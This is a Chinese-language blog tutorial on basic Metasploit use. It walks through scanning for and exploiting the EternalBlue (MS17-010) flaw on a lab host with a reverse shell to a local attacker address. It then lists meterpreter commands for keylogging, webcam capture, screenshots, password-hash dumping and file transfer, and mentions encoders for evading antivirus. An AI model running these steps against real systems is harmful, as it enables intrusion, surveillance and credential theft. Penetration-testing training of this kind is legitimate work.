Msf基本使用步骤

概述

MSF = Metasploit Framework,是全球最知名、开源免费、功能最全的一体化渗透测试框架,由 Rapid7 公司维护,默认预装在 Kali、Parrot 等安全系统中。

启动

msfconsole

/usr/share/metasploit-framework/modules下有七大核心模块

auxiliary 辅助模块

渗透前期信息搜集、探测、爆破,无入侵提权能力,不会直接拿 shell。

exploits 漏洞利用模块(MSF 核心)

存放所有公开漏洞利用 EXP,利用系统 / 软件漏洞执行代码,拿到目标主机权限

payloads 载荷模块

入侵成功后,在受害主机上运行的后门代码,决定入侵后能实现什么操作。

encoders 编码器

对 payload 进行编码、变形,修改特征码,尝试绕过杀毒软件查杀

nops 空指令模块

NOP = 空操作指令(x86 下0x90),填充无意义指令。

post 后渗透模块

拿到主机权限之后使用,巩固权限、内网渗透、信息搜集。

常见使用方法

使用search 搜索漏洞相关利用模块,这里以永恒之蓝为例

使用辅助模块探测漏洞

use auxiliary/scanner/smb/smb_ms17_010
或
use 24

show options显示要填写的参数

需要填写目标主机RHOSTS

set rhosts 192.168.10.134

run运行,探测到可能存在永恒之蓝漏洞

使用exploit模块对永恒之蓝进行利用

得先设置反弹shell的ip和端口

set lhost 192.168.19.128
set lport 4444

还要设置靶机的ip

set rhosts 192.168.10.134

RUN

出现meterpreter >就表示拿到目标机的最高权限,下面列出常见命令

命令 作用
help 查看全部可用指令
sysinfo 查看目标电脑系统、CPU 信息
getuid 查看当前权限
screenshot 截取目标电脑当前屏幕
keyscan_start 开启键盘记录,keyscan_dump 查看按键记录
camshot 调用摄像头拍照
upload 本地文件 目标路径 上传文件到被控电脑
download 目标文件 本地路径 下载电脑文件到 Kali
hashdump 抓取 Windows 账号密码哈希
shell 调出目标电脑 cmd 命令行
background 把会话挂后台,回到 msf 控制台

background可以把会话挂到后台,回到msf控制台进行其他操作,如果想回到会话,使用session id指定会话

小结

本篇文章会持续更新(应该会吧),目前只介绍了最常见的使用方法。如果对其他功能感兴趣可以参考官方文档Setting Module Options | Metasploit Documentation Penetration Testing Software, Pen Testing Security

posted @ 2026-08-01 11:49  leee0  阅读(10)  评论(0)    收藏  举报